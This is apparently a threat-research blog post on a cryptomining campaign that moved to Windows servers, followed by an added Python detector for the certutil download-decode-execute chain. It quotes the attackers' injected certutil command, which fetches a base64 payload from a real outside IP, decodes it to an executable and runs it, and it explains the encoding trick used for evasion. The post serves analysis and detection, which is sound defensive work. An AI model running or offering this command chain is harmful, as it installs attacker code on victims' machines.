Old Dog, New Targets: Switching to Windows to Mine Electroneum
- by nlqip
Figure 2: Latest attack request targeting Windows servers
As shown in Figure 2, the latest attack requests target the same URL, keeping the same HTTP header values and the same exploit structure; however, they now use Windows shell commands to download and execute a file.
Using the Windows certutil Tool
While Linux ships with built-in command-line HTTP client tools like “curl” and “wget”, Windows doesn’t have parallel tools. The common alternative is to either write a Visual Basic or a PowerShell script or use the Windows BITSAdmin tool, which is typically used for download and upload jobs. We have already witnessed attackers leveraging BITSAdmin in other campaigns. However, the current attackers chose to use a more creative technique, as the following injected commands show:
certutil -urlcache -split -f http://45.77.55.231/update.b64 update.b64 & certutil -decode update.b64 update.exe & update.exe
The attacker uses a command-line tool named “certutil” which, as described by Microsoft below, is part of the Windows operating system.
“Certutil.exe is a command-line program that is installed as part of Certificate Services. You can use Certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.”
However, a lesser-known feature of the tool is fetching and caching certificate files from remote hosts using the “urlcache” flag. This is useful in attack scenarios and even provides a simple evasion capability using the base64-encoded certificate format, as shown in Figure 3.
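As an added example (not part of the original article), the following detector scans constructed process command-line records for the certutil download-decode-execute chain described above. It normalizes certutil's `-`/`/` flag prefixes and case, splits chained commands on `&`, `&&` and `|`, and reports when the file produced by `-decode` is executed later in the same command line. The sample log lines and the host name in the URL are constructed for this example.

```python
import re

# Constructed sample process-creation command lines (not taken from the article).
SAMPLE_LOGS = [
    "certutil -urlcache -split -f http://example.invalid/update.b64 update.b64 "
    "& certutil -decode update.b64 update.exe & update.exe",
    '"C:\\Windows\\System32\\certutil.exe" /verify /urlfetch C:\\certs\\server.cer',
    "CertUtil.EXE -URLCache -f http://example.invalid/a.txt a.txt",
    "powershell -c Get-Date",
]

FLAG_RE = re.compile(r"^[-/]([a-z]+)$", re.I)          # certutil accepts -flag and /flag
URL_RE = re.compile(r"^https?://", re.I)
SPLIT_RE = re.compile(r"\s*(?:&&|\|\||&|\|)\s*")       # cmd.exe command separators

def parse_certutil(segment):
    """Return (flags, positional args) if the segment invokes certutil, else None."""
    tokens = segment.split()
    if not tokens:
        return None
    exe = tokens[0].strip('"').rsplit("\\", 1)[-1].lower()
    if exe not in ("certutil", "certutil.exe"):
        return None
    flags, args = set(), []
    for tok in tokens[1:]:
        m = FLAG_RE.match(tok)
        if m:
            flags.add(m.group(1).lower())
        else:
            args.append(tok)
    return flags, args

def classify(cmdline):
    """Return a list of findings for one command line (empty list if benign)."""
    findings, decoded = [], set()
    for seg in SPLIT_RE.split(cmdline):
        parsed = parse_certutil(seg)
        if parsed is None:
            # Not certutil: check whether it runs a file that -decode wrote earlier.
            first = seg.split()[0].strip('"').lower() if seg.split() else ""
            if first in decoded:
                findings.append("executes decoded file: " + first)
            continue
        flags, args = parsed
        if "urlcache" in flags and any(URL_RE.match(a) for a in args):
            findings.append("certutil download via -urlcache")
        if "decode" in flags and len(args) >= 2:
            findings.append("certutil base64 decode")
            decoded.add(args[-1].lower())   # output file of -decode
    return findings
```

A plain `certutil /verify` with a local certificate path produces no finding, so the rule keys on the `urlcache` flag with a URL argument rather than on the binary name alone.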